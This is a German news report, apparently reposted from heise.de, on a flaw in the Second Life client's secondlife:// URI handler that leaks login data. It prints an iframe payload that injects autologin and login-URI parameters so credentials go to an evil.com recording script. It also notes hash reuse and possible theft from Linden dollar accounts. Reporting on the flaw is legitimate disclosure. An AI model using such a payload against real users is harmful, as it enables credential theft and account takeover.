Sicherheitslücke in Second-Life-Client

  • Der Security-Blogger Petko Petkov hat auf eine Schwachstelle im Client der virtuellen Spielewelt Second Life hingewiesen, mit der es möglich ist, an die Login-Daten von Anwendern zu gelangen. Der Client registriert bei der Installation die URI secondlife://; zusätzlich lassen sich beim Aufruf des Clients über die URI weitere Parameter übergeben. Durch Einbetten folgender Zeile in eine Webseite kann ein Angreifer den Client ohne Rückfrage dazu bewegen, die Anmeldedaten in einem XML-Formular zu versenden:


    <iframe src='secondlife://" -autologin
    -loginuri "http://evil.com/sl/record-login.php'></iframe>


    In einem vom Second-Life-Client übertragenen XML-Dokument stecken dann der Anmeldename und das gespeicherte Passwort, das allerdings als MD5-Hash verschickt wird. Aus dem Hash lässt sich beispielsweise mit online verfügbaren Rainbow-Tables das Passwort gewinnen. Petkov weist aber darauf hin, dass in der Regel der Hash zum Anmelden bei Second Life ausreiche. Das Passwort sei nur notwendig, um weitere Dienste von Second Life zu nutzen. Für einen erfolgreichen Angriff genügt es, dass ein Opfer eine präparierte Webseite besucht oder eine HTML-Mail öffnet. Eine Lösung für die Lücke gibt es nicht, als Workaround dürfte das De-Registrieren der URI hilfreich sein.


    Stellt sich noch die Frage, was man mit den kopierten Logindaten anstellen kann. Am lukrativsten dürfte der Versuch sein, das virtuelle Lindendollar-Konto eines Opfers leerzuräumen. Derzeit sind 1000 Lindendollar 3,50 echte US-Dollar wert. Beim Zurückwechseln größerer Beträge dürfte aber mit Schwierigkeiten zu rechnen sein, da der zulässige Betrag limitiert ist und von der Zugehörigkeitsdauer des Teilnehmers abhängt. Ohnehin sollen nur wenige Teilnehmer über mehr als 250.000 Lindendollar (rund 635 Euro) verfügen.


    quelle: heise.de

Jetzt mitmachen!

Du hast noch kein Benutzerkonto auf unserer Seite? Registriere dich kostenlos und nimm an unserer Community teil!